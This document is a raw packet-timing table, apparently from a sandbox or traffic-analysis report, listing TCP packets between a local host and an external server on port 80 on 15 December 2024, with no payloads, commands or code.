                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.459805965 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.460597038 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.460701942 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.460769892 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.461801052 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.461884975 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.462090015 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.462922096 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.463035107 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.463099003 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.464093924 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.464109898 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.464179993 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.465274096 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.465394974 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.465462923 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.466406107 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.466487885 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.466598988 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.467566967 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.467622995 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.467726946 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.468787909 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.468899965 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.469134092 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.469886065 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.470022917 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.470086098 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.471048117 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.471141100 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.471209049 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.472204924 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.472347021 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.472493887 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.473402023 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.473479986 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.473546982 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.474541903 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.474631071 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.475414038 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.475697994 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.475819111 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.475887060 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.476852894 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.476939917 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.477278948 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.478019953 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.478183985 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.478252888 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.479227066 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.479310036 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.479651928 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.480391026 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.480493069 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.480571032 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.481482029 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.481609106 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.481678963 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.482707977 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.482791901 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.482893944 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.483865023 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.483994007 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.484055042 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.485045910 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.485188961 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.485440969 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.486152887 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.486263990 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.486321926 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.487303019 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.487411976 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.487606049 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.488473892 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.488580942 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.488672018 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.489661932 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.489759922 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.490518093 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.490812063 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.490955114 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.491020918 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.491940022 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.492151022 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.492430925 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.493149996 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.493263960 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.494316101 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.494381905 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.494393110 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.494452000 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.495424986 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.495564938 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.495615959 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.496589899 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.496685028 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.497772932 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.497826099 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.497859001 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.497898102 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.498925924 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.499017000 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.499079943 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.500065088 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.500159979 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.500241041 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.501250982 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.501364946 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.501430035 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.502394915 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.502516031 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.502588987 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.503571033 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.503673077 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.503803015 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.504717112 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.504771948 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.505012989 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.505867004 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.505970001 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.506027937 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.507029057 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.507205963 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.507265091 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.508198023 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.508331060 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.508388042 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.509356022 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.509484053 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.509609938 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.510515928 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.510657072 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.510716915 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.511727095 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.511861086 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.511920929 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.512902975 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.513078928 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.513134956 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.514725924 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.514805079 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.514900923 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.515517950 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.515597105 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.515661001 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.516320944 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.516437054 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.516493082 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.517494917 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.517637968 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.517695904 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.518604040 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.567508936 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.649812937 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.650163889 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.650228977 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.650361061 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.650484085 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.650546074 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.651561022 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.651669025 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.651724100 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.652710915 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.652797937 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.652955055 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.653970957 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.653990984 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.654062033 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.655100107 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.655122995 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.655181885 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.656357050 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.657336950 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.657351017 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.657394886 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.657459021 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.657526016 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.658513069 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.658600092 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.658674955 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.659780025 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.659797907 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.659868956 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.660938025 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.660960913 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.661501884 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.662095070 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.662115097 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.662178993 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.663171053 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.663381100 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.663448095 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.664339066 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.664685965 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.664747953 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.665535927 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.665555000 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.665647030 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.666698933 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.666712999 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.666800022 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.667867899 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.667885065 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.667967081 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.668946028 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.670012951 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.670130014 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.670198917 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.670589924 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.670897961 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.671339989 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.671360970 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.671451092 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.672511101 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.672530890 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.672616005 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.673671007 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.673691034 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.673760891 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.674824953 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.674846888 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.674926043 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.675987959 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.676012993 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.676090956 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.677151918 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.677167892 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.677243948 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.678307056 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.678322077 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.678376913 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.679393053 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.679634094 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.679685116 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.680655956 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.680670977 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.680727005 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.681752920 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.681830883 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.682049990 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.682840109 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.682952881 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.683012009 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.684043884 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.684181929 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.684233904 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.685280085 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.685295105 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.685353994 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.686459064 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.686474085 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.686538935 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.687627077 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.687645912 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.687702894 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.688796043 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.688817024 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.688960075 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.689934969 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.689954996 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.690026045 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.691054106 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.691358089 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.691525936 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.692358017 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.692378044 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.692447901 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.693406105 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.693422079 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.693489075 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.694542885 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.694876909 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.694942951 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.695717096 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.695924997 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.695983887 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.696818113 CET8049708185.81.68.147192.168.2.5
